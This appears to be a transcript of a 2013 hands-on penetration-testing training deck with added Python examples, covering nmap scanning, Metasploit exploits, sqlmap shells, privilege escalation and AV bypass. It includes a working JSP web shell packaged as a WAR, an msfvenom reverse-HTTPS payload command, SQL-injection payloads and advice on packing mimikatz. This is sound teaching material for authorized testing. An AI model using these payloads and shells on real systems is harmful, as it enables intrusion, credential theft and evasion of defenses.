DC612 Day - Hands on Penetration Testing 101
Hands on Penetration Testing 101 DC612: March 9, 2013

Upload: dc612

Post on 10-May-2015


DESCRIPTION

Title: Hands on Penetration Testing 101 by Scott Sutherland & Karl Fosaaen. Abstract: The goal of this training is to introduce attendees to standard penetration test methodologies, tools, and techniques. Hands-on labs will cover the basics of asset discovery, vulnerability enumeration, system penetration, privilege escalation, and bypassing endpoint protection. During the labs, common vulnerabilities will be leveraged to illustrate attack techniques, using freely available tools such as Nmap and Metasploit. This training will be valuable to anyone interested in gaining a better understanding of penetration testing, or to system administrators trying to understand common attack approaches.

TRANSCRIPT

Page 1: DC612 Day - Hands on Penetration Testing 101

Hands on Penetration Testing 101
DC612: March 9, 2013

Page 2

Who are we?

• Karl Fosaaen
• Scott Sutherland

Security Consultants @ NetSPI

Page 3

Presentation Overview

• What is a “Penetration Test”?
• Why do companies “pen test”?
• Assessment vs. penetration test
• Common penetration test approach
• Rules of engagement
• Nmap intro
• Metasploit intro
• Pen test labs
• Wrap up

Page 4

What is Penetration Testing?

“The process of evaluating systems, applications, and protocols with the intent of identifying vulnerabilities from the perspective of an unprivileged or trusted user to determine the potential real world impacts…”

“…legally and under contract”

Page 5

Why do Companies Pen Test?

• Compliance requirements
• Identify unknown security gaps
• Prioritize existing security initiatives
• Validate existing controls
• Prevent data breaches
• Test IDS / IPS / IRP

Page 6

What are the Technical Objectives?

• Client specific objectives first
• Identify and verify all entry points
• Identify critical escalation points
• Gain unauthorized access to:
‒ Application functionality
‒ Critical systems
‒ Sensitive data

Page 7

Assessment vs. Penetration

• Vulnerability assessment and penetration testing both answer:
‒ What are my system layer vulnerabilities?
‒ Where are my system layer vulnerabilities?
‒ How widespread are my system layer vulnerabilities?
‒ Can I identify attacks?
‒ How do I fix my vulnerabilities?

Page 8

Assessment vs. Penetration

• Penetration testing answers:
‒ What are my high impact network layer issues?
‒ What are my high impact application layer issues?
‒ Can an attacker gain unauthorized access to:
  • critical infrastructure that provides privileged access or could cause service disruptions
  • critical application functionality that the business depends on
  • sensitive data that the business would be required to report on if a breach occurs
‒ Can an attacker bypass our IPS / WAF?
‒ Can an attacker pivot from environment A to environment B?

Page 9

Rules of Engagement

• Have fun, but… hack responsibly!
• Written permission
• Stay in scope
• No DoS
• Don’t change major state
• Restore state
• Clear communication

Page 10

Intro to the Common Toolsets

• Backtrack
• Nmap
• Metasploit


Page 12

Installing Backtrack

• Goal
‒ Consolidate tools, and generally make a penetration testing platform that is free.
• Download the latest BT ISO
‒ http://www.backtrack-linux.org/downloads/
‒ Click download and choose ISO
• Download UNetbootin or YUMI
‒ http://unetbootin.sourceforge.net/
‒ http://www.pendrivelinux.com/yumi-multiboot-usb-creator/
• Install to USB
‒ Follow the program wizard to write the ISO to the USB drive

Page 13: DC612 Day - Hands on Penetration Testing 101

Intro to the Common Toolsets

•Backtrack

•Nmap

•Metasploit

Page 14

Nmap Introduction

• Purpose: Service mapping and vulnerability scanning
• Download: insecure.org
• Language: Written in C/C++, scripting in Lua (NSE)
• Module types: Mostly enumeration, but there are some exploit modules
• Execution options: nmap CLI and Zenmap GUI
• Scripts: Ship with nmap by default, but can also be downloaded from insecure.org

Page 15

Installing Nmap: Linux (Ubuntu)

• Download the latest build from:
‒ http://nmap.org/download.html
‒ svn co --username guest
• Dependencies: gcc, openssl, and make
• Install as root
• From the package repository: apt-get install nmap
• Install from source:
‒ ./configure && make && make install
• Flags exist to remove features, e.g. --without-zenmap

Page 16

Installing Nmap: Windows

• Windows
‒ Download the latest from http://nmap.org/download.html
‒ Log in as admin, double click, next, next, done
‒ Say yes to WinPcap (Nmap needs it for raw packet scans such as -sS and -O)

Page 17

Nmap Tools

• Nmap: Used for network mapping and auditing
• Ncat: Similar to netcat, but better
• Ndiff: Used for comparing nmap scans
• Nping: Used for understanding firewall rules, detecting packet corruption, etc.
• Zenmap: GUI interface

Page 18

Nmap Introduction

• Lua (NSE) scripts
‒ Located in: …/nmap/scripts (for a default source install, /usr/local/share/nmap/scripts)
‒ Documented at: http://nmap.org/nsedoc/scripts/
• Script categories:
‒ auth
‒ broadcast
‒ brute
‒ default
‒ discovery
‒ dos
‒ exploit
‒ external
‒ fuzzer
‒ intrusive
‒ malware
‒ safe
‒ version
‒ vuln


Page 20

Metasploit Introduction

• Purpose: Develop and use scanners, admin tools, and exploits
• Download: metasploit.com, or clone the github.com repository
• Language: Ruby
• Modules: Auxiliary, Exploits, Encoders, Nops, Payloads, Post
• Execution options: msfconsole, msfcli, web interfaces, RPC interface, Armitage
• Scripting: modules, resource scripts, startup scripts, auto-run scripts, IRB, Railgun

Page 21

Installing Metasploit: Windows

• Disable anti-virus or create a directory exception
• Download from metasploit.com
‒ Log in as admin, double click, next, next, done
• Or download a git client for Windows and clone the framework:
‒ git clone https://github.com/rapid7/metasploit-framework.git
• Service / process heavy

Page 22

Installing Metasploit: Linux (Ubuntu)

• apt-get update && apt-get install metasploit
• Or download a git client for Linux and clone the framework:
‒ git clone https://github.com/rapid7/metasploit-framework.git

Page 23

Metasploit Introduction

• Modules are located in the following default Metasploit directories:
‒ Auxiliary: /msf3/modules/auxiliary
‒ Exploit: /msf3/modules/exploits
‒ Encoders: /msf3/modules/encoders
‒ Nops: /msf3/modules/nops
‒ Payloads: /msf3/modules/payloads
‒ Post: /msf3/modules/post

Page 24

Metasploit: Console Commands

• ?
• search tomcat
• use
‒ use exploit/windows/smb/ms08_067_netapi
• show options
• show advanced options
• set & setg
‒ set payload windows/meterpreter/reverse_https
• exploit & run
• resource

Page 25

Metasploit: Meterpreter Commands

• ipconfig
• ls
• ps
• migrate
• shell
• execute
• Post modules
• AutoRunScript (single or multiple commands)

Page 26

Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks, etc.
• Information Gathering
• Vulnerability Enumeration
• Penetration
• Escalation
• Evidence Gathering (Pilfering)
• Clean Up
• Report Creation
• Report Delivery and Review
• Remediation


Page 28

Asset Discovery: Overview (internal)

• Goal: Identify active systems and services. This should include web applications and web services.
• Common Methods:
‒ Passive identification (sniffing)
‒ Directory lookups (DNS, ADS, etc.)
‒ Active identification (scanning - direct)
‒ Active identification (scanning - broadcast)

Page 29

Asset Discovery: Labs

• Passive Network Mapping
‒ Wireshark: GUI
‒ NetworkMiner: GUI
‒ Cain and Abel

Page 30

Asset Discovery: Labs

• Directory Listings
‒ ADS computer names via the computer accounts (their account names end in $)
  • DumpAcl
  • Metasploit smb_lookupsid module
  • adfind.exe (joeware)
‒ DNS server lookups
  • nslookup -type=SRV _ldap._tcp.domain.com
  • dnsrecon.py
‒ DNS zone transfer
  • dig axfr domain.com @dnsserver
  • dnsrecon.py

Page 31

Asset Discovery: Labs

• Target IP Formats
‒ Single
  • nmap 192.168.1.1
‒ Comma separated (commas work within an octet; whole targets are separated by spaces)
  • nmap 192.168.1.1,10
‒ Range
  • nmap 192.168.1.1-254
‒ CIDR
  • nmap 192.168.1.0/24
‒ File
  • nmap -iL ipaddress.txt

Page 32

Asset Discovery: Labs

• Target Port Formats
‒ All
  • nmap -p- 192.168.1.1
‒ Single
  • nmap -p80 192.168.1.1
‒ Comma
  • nmap -p80,443 192.168.1.1
‒ Range
  • nmap -p1-65535 192.168.1.1
‒ Protocol (UDP scans need root)
  • nmap -sT -sU -p T:80,U:161 192.168.1.1

Page 33

Asset Discovery: Labs

• List Scanning (reverse DNS only, no packets to the targets)
‒ nmap -sL 192.168.1.0/24
• Active Ping Sweeping (-sn sweeps without port scanning; the probe port is attached to the flag, -p sets scan ports and is not what you want here)
‒ ICMP echo: nmap -sn -PE 192.168.1.1 (ICMP timestamp is -PP)
‒ SYN: nmap -sn -PS443 192.168.1.1
‒ ACK: nmap -sn -PA80 192.168.1.1
• Active Broadcast Ping
‒ ARP: nmap -sn -PR 192.168.1.1 (the default for targets on the local subnet)
‒ Scripts:
  • nmap --script broadcast

Page 34

Asset Discovery: Labs

• Basic Port Scanning
‒ TCP full connect
  • nmap -sT 192.168.1.1
‒ TCP SYN (needs root)
  • nmap -sS 192.168.1.1
‒ No ping (treat the host as up)
  • nmap -sS -Pn 192.168.1.1
‒ UDP
  • nmap -sU 192.168.1.1

Page 35

Asset Discovery: Labs

• Basic Performance Tuning
‒ Timing template (-T0 to -T5; the flag is uppercase T)
  • nmap -sS -p80-443 -Pn -T5 <targets>
  • Higher is faster, but less accurate
‒ Reverse DNS lookup
  • Disable: nmap -sS -p80-443 -Pn -T5 -n <targets>
  • Always resolve: nmap -sS -p80-443 -Pn -T5 -R <targets>

Page 36

Asset Discovery: Labs

• Active Fingerprinting
‒ Service fingerprinting
  • nmap -sV <targets>
‒ Operating system fingerprinting (needs root)
  • nmap -O <targets>
‒ Service and OS fingerprinting, script scanning, and traceroute
  • nmap -A <targets>
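Added example, not part of the slides: the sweep, port scan and fingerprint steps above each leave you with nmap output that feeds the next stage's target list. This Python script parses grepable (-oG) output, keeps only hosts that were up and ports that were open, and builds the -sV follow-up command over just those. The sample scan text, the 192.168.1.x addresses and the hostname in it are constructed for the example.

```python
import re

# Constructed sample of nmap grepable (-oG) output for a TCP+UDP scan; not a capture from the lab network.
SAMPLE_GNMAP = """\
# Nmap 6.25 scan initiated Sat Mar  9 10:00:00 2013 as: nmap -sS -sU -pT:80,443,445,U:161 -oG - 192.168.1.0/24
Host: 192.168.1.1 (gw.lab.local)\tStatus: Up
Host: 192.168.1.1 (gw.lab.local)\tPorts: 80/open/tcp//http//, 443/open/tcp//https//, 445/closed/tcp//microsoft-ds//, 161/open|filtered/udp//snmp//
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 80/closed/tcp//http//, 443/closed/tcp//https//, 445/open/tcp//microsoft-ds//, 161/closed/udp//snmp//\tIgnored State: closed (0)
Host: 192.168.1.20 ()\tStatus: Down
# Nmap done at Sat Mar  9 10:00:30 2013 -- 256 IP addresses (2 hosts up) scanned in 30.00 seconds
"""

# One -oG port entry looks like port/state/protocol/owner/service/rpc/version/
PORT_RE = re.compile(r"(\d+)/([^/]+)/(tcp|udp)/[^/]*/([^/]*)/")
HOST_RE = re.compile(r"Host: (\S+) \(([^)]*)\)")


def parse_gnmap(text):
    """Map each IP to its hostname, up/down status and (port, proto, state, service) tuples."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        match = HOST_RE.match(fields[0])
        if not match:
            continue
        entry = hosts.setdefault(match.group(1), {"hostname": match.group(2), "up": False, "ports": []})
        for field in fields[1:]:
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["up"] = value.strip() == "Up"
            elif key == "Ports":
                for port, state, proto, service in PORT_RE.findall(value):
                    entry["ports"].append((int(port), proto, state, service))
    return hosts


def _ip_key(ip):
    return tuple(int(octet) for octet in ip.split("."))


def live_hosts(hosts):
    """IPs that answered the sweep, in address order, ready to be written to an -iL file."""
    return sorted((ip for ip, host in hosts.items() if host["up"]), key=_ip_key)


def open_ports(hosts, proto="tcp"):
    """(ip, port, service) for every port reported open. UDP open|filtered is deliberately not counted."""
    found = []
    for ip in live_hosts(hosts):
        for port, port_proto, state, service in hosts[ip]["ports"]:
            if port_proto == proto and state == "open":
                found.append((ip, port, service))
    return found


def next_stage_command(hosts, proto="tcp"):
    """Build the -sV follow-up over only the live hosts and the ports that were actually open."""
    ports = sorted({port for _, port, _ in open_ports(hosts, proto)})
    scan = "-sV" if proto == "tcp" else "-sU -sV"
    port_list = ",".join(str(port) for port in ports)
    return f"nmap {scan} -Pn -n -p{port_list} {' '.join(live_hosts(hosts))}"


if __name__ == "__main__":
    parsed = parse_gnmap(SAMPLE_GNMAP)
    for ip, port, service in open_ports(parsed):
        print(f"{ip}:{port} {service}")
    print(next_stage_command(parsed))
```

Save a real scan with -oG scan.gnmap and pass the file contents to parse_gnmap. UDP open|filtered usually means no reply at all rather than a confirmed service, which is why open_ports leaves it out; run the -sV stage on those ports separately if they matter.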


Page 38

Vulnerability Enumeration: Overview

• Goal: Identify vulnerabilities at the application, server, and network layers. Weed out false positives and highlight potential entry points.
• Common Methods:
‒ Automated identification
  • All layers: many tools, multiple rounds
‒ Manual identification
  • Verify automated findings
  • Application attacks
  • Password attacks (defaults and guessing)
  • Protocol attacks

Page 39

Vulnerability Enumeration: Labs

• Basic Banner Grabbing (ncat takes the host and port as arguments; -p is the source port and -U means a Unix domain socket, so neither belongs here)
‒ ncat 192.168.1.1 80
‒ ncat --ssl 192.168.1.1 443
‒ ncat -u 192.168.1.1 161

Page 40

Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with Nmap
‒ Tomcat Case Study
  • Identify the service with Nmap
  • nmap -sV -p22,514,8009,8080,9090 192.168.1.1
  • Verify credentials manually
  • nmap --script vuln -p22,514,8009,8080,9090 192.168.1.1

Page 41

Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with MSF
‒ Tomcat Case Study
  • Find servers
    use auxiliary/admin/http/tomcat_administration
  • Find weak passwords
    use auxiliary/scanner/http/tomcat_mgr_login

Page 42

Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with Nmap
‒ MS08_067 Case Study
  • Identify with Nmap
  • nmap --script smb-check-vulns.nse -p445 192.168.1.1
  • The script is in the intrusive and dos categories and can crash an unpatched target; keep the no-DoS rule from the rules of engagement in mind

Page 43

Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with SQLMap
‒ SQL Injection Case Study
  • Identify with SQLMap
  • python sqlmap.py -u "http://192.168.1.106/employee.asp?id=1" -s session_log
  • Verify manually
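Added example, not from the deck: what "verify manually" means for the employee.asp?id=1 case above. The script stands up an in-memory SQLite table in place of the lab's database, reproduces the concatenation bug that sqlmap reports, and runs the boolean (AND 1=1 / AND 1=2) and UNION checks a tester would type into the parameter by hand; the parameterized version of the same lookup shows the fix and fails both checks. The schema, rows and credentials are constructed.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the lab's employee database (schema and rows are made up)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE employees (id INTEGER PRIMARY KEY, name TEXT, ssn TEXT);
        INSERT INTO employees VALUES (1, 'Alice', '111-22-3333'), (2, 'Bob', '444-55-6666');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'Summer2013!');
    """)
    return db


def lookup_vulnerable(db, id_param):
    """The bug behind employee.asp?id=1: the query-string value is concatenated straight into the SQL."""
    sql = "SELECT name FROM employees WHERE id = " + id_param
    return [row[0] for row in db.execute(sql)]


def lookup_fixed(db, id_param):
    """Hardened form: validate the type, then bind the value so it can never be parsed as SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    return [row[0] for row in db.execute("SELECT name FROM employees WHERE id = ?", (id_value,))]


# Payloads a tester types into the id parameter by hand to confirm what the scanner reported.
TRUE_PAYLOAD = "1 AND 1=1"
FALSE_PAYLOAD = "1 AND 1=2"
UNION_PAYLOAD = "1 UNION SELECT username || ':' || password FROM users"


def boolean_check(lookup, db):
    """Boolean-based verification: a real injection point answers 'AND 1=1' like the baseline and 'AND 1=2' differently."""
    baseline = lookup(db, "1")
    return baseline == lookup(db, TRUE_PAYLOAD) and baseline != lookup(db, FALSE_PAYLOAD)


def union_check(lookup, db):
    """Union-based verification: rows from another table show up in the page output."""
    return sorted(lookup(db, UNION_PAYLOAD))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", boolean_check(lookup_vulnerable, db))
    print("fixed handler injectable:", boolean_check(lookup_fixed, db))
    print("union payload against vulnerable handler:", union_check(lookup_vulnerable, db))
```

The boolean pair is the check to reach for first on a live target because it needs no extra tables and produces no errors in the application log; the UNION payload only works once the column count and a readable table name are known, which is what sqlmap's enumeration options spend their requests on.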


Page 45

Penetration: Overview

• Goal: Gain initial unauthorized access to systems, applications, and sensitive data.
• Common Methods (generally, vulnerabilities result in read access, write access, or arbitrary command execution):
‒ Default credentials
‒ Weak protocols
‒ SQL injection
‒ Upload vulnerabilities
‒ Missing critical patches

Page 46

Penetration: Labs

• Tomcat Case Study:
‒ Log into Tomcat with the default password
‒ Create the WAR file
  • Or use the CMD.war from the additional tools folder
  • Custom = unpack, edit, repack
  • http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf
‒ Publish the payload to get the web shell
‒ Navigate to the /cmd/cmd.jsp page
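Added example of the "create the WAR file" step; it is not the deck's CMD.war, whose contents are not reproduced here. A WAR is a zip archive with a WEB-INF/web.xml, so Python's zipfile module can build one from scratch or take the unpack, edit, repack route on an existing one. The JSP page and the base URL are constructed for the example; the context path is derived from the WAR file name, which is why the slide ends at /cmd/cmd.jsp.

```python
import io
import zipfile

# Constructed minimal JSP command page; stands in for the cmd.jsp inside the deck's CMD.war.
CMD_JSP = """<%@ page import="java.io.*" %>
<pre><%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%></pre>
"""

# Minimal deployment descriptor; a plain JSP needs nothing more than this.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5"></web-app>
"""


def build_war(jsp_name="cmd.jsp"):
    """A WAR is a zip with WEB-INF/web.xml; the JSP at the root is served as /<context>/<jsp_name>."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, CMD_JSP)
    return buf.getvalue()


def repack(war_bytes, replacements):
    """The 'unpack, edit, repack' route: copy every entry, swapping in the edited files."""
    src = zipfile.ZipFile(io.BytesIO(war_bytes))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename not in replacements:
                dst.writestr(info.filename, src.read(info.filename))
        for name, data in replacements.items():
            dst.writestr(name, data)
    return out.getvalue()


def war_entries(war_bytes):
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def read_entry(war_bytes, name):
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return war.read(name).decode("utf-8")


def shell_url(base_url, war_filename, jsp_name="cmd.jsp"):
    """Tomcat uses the WAR file name (minus .war) as the context path, so cmd.war is reachable under /cmd/."""
    context = war_filename[:-4] if war_filename.lower().endswith(".war") else war_filename
    return f"{base_url.rstrip('/')}/{context}/{jsp_name}"


if __name__ == "__main__":
    war = build_war()
    with open("cmd.war", "wb") as fh:
        fh.write(war)
    print(war_entries(war))
    print(shell_url("http://192.168.1.1:8080", "cmd.war"))
```

Upload the resulting cmd.war through the manager application the slide logs into, then request the URL shell_url returns with a cmd parameter. Anything deployed this way is an uploaded file and a new application for the clean-up step: undeploy it and remove the WAR when you are done.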

Page 47

Penetration: Labs

• MS08_067 Case Study:
‒ Run the Metasploit exploit
  • use exploit/windows/smb/ms08_067_netapi
  • set RHOST 192.168.1.1
  • exploit

Page 48

Penetration: Labs

• SQL Injection Case Study:
‒ Use SQLMap to get a SQL shell
  • python sqlmap.py -u "http://192.168.1.106/employee.asp?id=1" --sql-shell -s session_log
‒ Use SQLMap to get a Meterpreter shell
  • python sqlmap.py -u "http://192.168.1.106/employee.asp?id=1" -v 1 --os-pwn --msf-path=/opt/framework3/msf3 -s session_log --priv-esc


Page 50

Escalation: Overview

• Goal: Escalate privileges to gain access to critical resources.
• Common Methods (Windows):
‒ getsystem (with UAC bypass)
‒ Clear text passwords
‒ Known local exploits (sysret example)
‒ Service attacks
‒ Scheduler attacks
‒ Impersonate tokens (incognito or migrate)
‒ Dump passwords (mimikatz, and msf post modules)
‒ Pass the hash (smart_hashdump + psexec)

Page 51

Escalation: Labs

• GETSYSTEM
‒ Configure psexec with an AutoRunScript
• Attack Scheduled Tasks
‒ Create a scheduled task to run as SYSTEM
‒ Configure the task to run batch script files
‒ Give “Everyone” write access to the scripts
• Attack Insecure Services
‒ Create an insecurely registered service
‒ Drop the evil program.exe
‒ Restart the server for a shell (auto migrate)
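Added example, not part of the slides: the lab above plants the scheduled-task weakness on purpose, and on a real engagement you want the check that finds it. This Python script takes the CSV from schtasks /query /fo CSV /v and the icacls output for each task's script, both collected on the host, and reports tasks that run as SYSTEM whose script a low-privileged principal can overwrite. The host name, task names, paths and ACLs are constructed, and the CSV is trimmed to the columns the check uses.

```python
import csv
import io
import re

# Constructed excerpt in the shape of `schtasks /query /fo CSV /v` output, cut down to the columns used
# here (a real export carries many more). Host, task names and paths are made up.
SAMPLE_SCHTASKS_CSV = '''"HostName","TaskName","Task To Run","Run As User"
"LAB-WS1","\\Backup","C:\\scripts\\backup.bat","SYSTEM"
"LAB-WS1","\\Cleanup","C:\\scripts\\cleanup.bat","SYSTEM"
"LAB-WS1","\\UserSync","C:\\Users\\bob\\sync.bat","LAB-WS1\\bob"
'''

# Constructed `icacls <file>` output per target: the first line carries the path, later ACEs are indented.
SAMPLE_ICACLS = {
    r"C:\scripts\backup.bat": (
        "C:\\scripts\\backup.bat Everyone:(F)\n"
        "                      NT AUTHORITY\\SYSTEM:(F)\n"
        "                      BUILTIN\\Administrators:(F)\n"
        "\nSuccessfully processed 1 files; Failed processing 0 files\n"
    ),
    r"C:\scripts\cleanup.bat": (
        "C:\\scripts\\cleanup.bat NT AUTHORITY\\SYSTEM:(F)\n"
        "                       BUILTIN\\Administrators:(F)\n"
        "                       BUILTIN\\Users:(RX)\n"
        "\nSuccessfully processed 1 files; Failed processing 0 files\n"
    ),
    r"C:\Users\bob\sync.bat": (
        "C:\\Users\\bob\\sync.bat LAB-WS1\\bob:(F)\n"
        "                     Everyone:(F)\n"
        "\nSuccessfully processed 1 files; Failed processing 0 files\n"
    ),
}

PRIVILEGED_ACCOUNTS = {"SYSTEM", "NT AUTHORITY\\SYSTEM", "LOCALSYSTEM"}
LOW_PRIV_PRINCIPALS = {"EVERYONE", "BUILTIN\\USERS", "AUTHENTICATED USERS", "NT AUTHORITY\\AUTHENTICATED USERS"}
WRITE_RIGHTS = {"F", "M", "W"}  # full, modify, write: any of these lets the principal replace the script
ACE_RE = re.compile(r"^(.+?):((?:\([^)]*\))+)$")


def parse_icacls(path, output):
    """Return (principal, set_of_rights) for each ACE line of an icacls listing for `path`."""
    aces = []
    for line in output.splitlines():
        text = line.strip()
        if text.startswith(path):
            text = text[len(path):].strip()
        match = ACE_RE.match(text)
        if not match:
            continue
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", match.group(2)):
            rights.update(part.strip().upper() for part in group.split(","))
        aces.append((match.group(1).strip(), rights))
    return aces


def low_priv_writable(aces):
    return any(principal.upper() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS for principal, rights in aces)


def task_target(action):
    """The program a task runs: the quoted path if present, otherwise the first token."""
    action = action.strip()
    if action.startswith('"'):
        return action[1:action.index('"', 1)]
    return action.split(" ")[0]


def find_task_hijacks(schtasks_csv, icacls_by_path):
    """Tasks that run as SYSTEM whose script a low-privileged principal can overwrite."""
    hits = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        if row["Run As User"].upper() not in PRIVILEGED_ACCOUNTS:
            continue
        target = task_target(row["Task To Run"])
        listing = icacls_by_path.get(target)
        if listing and low_priv_writable(parse_icacls(target, listing)):
            hits.append((row["TaskName"], target))
    return hits


if __name__ == "__main__":
    for name, target in find_task_hijacks(SAMPLE_SCHTASKS_CSV, SAMPLE_ICACLS):
        print(f"{name} runs as SYSTEM and executes {target}, which low-privileged users can write")
```

The same two inputs cover the insecure-service variant on the next slide: swap the task CSV for the service binary paths from sc qc and run the icacls check over those. A hit means replacing the script (and waiting for the next run, or a reboot for a service) yields SYSTEM, which is exactly what the lab sets up; on a client system, restore the original file afterwards as part of clean up.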

Page 52

Bypassing Anti-Virus: Overview

• Goal: Execute malicious code without getting squashed by anti-virus.
• Common Methods
‒ Bypass anti-virus configuration
‒ Source code manipulation
‒ Binary manipulation
‒ Process / thread manipulation

Page 53

Bypassing Anti-Virus: Labs

• Bypass configuration
‒ Create an MSF DLL with a reverse HTTPS payload (the slide leaves the encoder name out of -e)
  • msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.74.162 LPORT=55555 -e <encoder> -i 1 -f dll > payload.dll
• Process Injection
‒ Create a PowerShell injection payload with ps_webshellscript
• Pack an existing file
‒ Modify the binary
‒ Pack mimikatz with MPRESS, UPX, or IExpress


Page 55

Evidence Gathering (Pilfering): Labs

• Finding Sensitive Files
‒ Common Locations
  • Databases
  • Text files
  • Applications
• Automated tools
‒ Spider
‒ Metasploit post modules
  • auxiliary/admin/mssql/mssql_findandsampledata

Page 56

Evidence Gathering (Pilfering): Labs

• Windows
‒ find (plus dir /s and findstr for file names and content)
• Linux
‒ find
‒ locate
‒ grep/sed/awk
• Applications
‒ Thick client and web apps
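Added example, not from the deck: the find/locate/grep step above as one script that works the same on either platform. It walks a directory tree, flags files by name (web.config, id_rsa, .bak, ...) and by content (password assignments, connection strings, private keys, SSN-like strings), skips binaries, and returns path, label and a short excerpt for the evidence log. The sample tree it builds in a temp directory, and every credential in it, is constructed.

```python
import os
import re
import tempfile

# File names worth opening on their own, whatever they contain.
FILENAME_HINTS = re.compile(r"(web\.config$|\.ini$|\.bak$|unattend\.xml$|\.kdbx$|id_rsa$|\.pem$|\.pfx$)", re.I)

# Content patterns; each hit is reported with a short excerpt for the evidence log.
CONTENT_PATTERNS = {
    "password_assignment": re.compile(r"\b(password|passwd|pwd)\s*[=:]\s*\S+", re.I),
    "connection_string": re.compile(r"(Data Source|Server)=[^;]+;.*(User ID|uid)=[^;]+;.*(Password|pwd)=[^;]+", re.I),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}
MAX_BYTES = 1024 * 1024  # only the first MiB of each file is inspected


def scan_tree(root):
    """Walk root and return sorted (relative_path, label, excerpt) findings; files with NUL bytes are skipped."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            path = os.path.join(dirpath, filename)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if FILENAME_HINTS.search(filename):
                findings.append((rel, "interesting_filename", filename))
            try:
                with open(path, "rb") as fh:
                    data = fh.read(MAX_BYTES)
            except OSError:
                continue
            if b"\x00" in data:
                continue
            text = data.decode("utf-8", "replace")
            for label, pattern in CONTENT_PATTERNS.items():
                match = pattern.search(text)
                if match:
                    findings.append((rel, label, match.group(0)[:60]))
    return sorted(findings)


def build_sample_tree():
    """Constructed directory tree standing in for a compromised host; every value here is made up."""
    root = tempfile.mkdtemp(prefix="pilfer_")
    files = {
        "inetpub/wwwroot/web.config": '<add name="hr" connectionString="Server=db1;Database=hr;User ID=sa;Password=Summer2013!" />',
        "home/bob/notes.txt": "vpn password: Winter2012\n",
        "home/bob/.ssh/id_rsa": "-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructed\n-----END RSA PRIVATE KEY-----\n",
        "hr/export.csv": "Alice,111-22-3333\n",
        "bin/tool.exe": "MZ\x00\x00password=notscanned",
        "etc/motd": "Welcome to the lab\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, label, excerpt in scan_tree(build_sample_tree()):
        print(f"{label:22} {rel}: {excerpt}")
```

Point scan_tree at a mounted share or a copied home directory rather than running it across a whole production volume; the excerpt is capped at 60 characters so the evidence file records that a secret exists without duplicating the whole secret.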


Page 58

Clean Up: Overview

• Goal: Be polite and leave the environment as you found it.
• Standard Clean Items
‒ Remove backdoors
‒ Remove all uploaded and generated files
‒ Restore all service states
‒ Restore all other configuration states
‒ Remove accounts that were created
• Leave the logs – the goal is transparency

Page 59

Wrap Up

• We covered:
‒ What penetration testing is
‒ Why companies pay for penetration testing
‒ What the rules of engagement are
‒ What the common approach is
‒ How to leverage a few common vulnerabilities

But most importantly, don’t forget to….

Page 60

BE SAFE and

HACK RESPONSIBLY

Page 61

Questions

Questions, comments, curses?